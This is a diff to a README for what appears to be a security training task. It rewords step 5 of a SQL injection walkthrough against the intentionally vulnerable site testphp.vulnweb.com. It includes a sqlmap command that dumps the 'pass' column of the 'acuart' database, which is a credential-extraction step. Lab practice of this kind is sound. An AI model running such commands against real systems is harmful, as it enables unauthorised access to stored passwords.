hipremsoni/CODTECH_TASK2/README.md

 - Now you see we got columns of databases.

-- step 5 : Now we got data from pass columns.
+- step 5 : Retrieve data from the pass column using the following command.
-- Now follow this command for find data on pass columns.

 ```COMMAND
 sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -C pass  --dump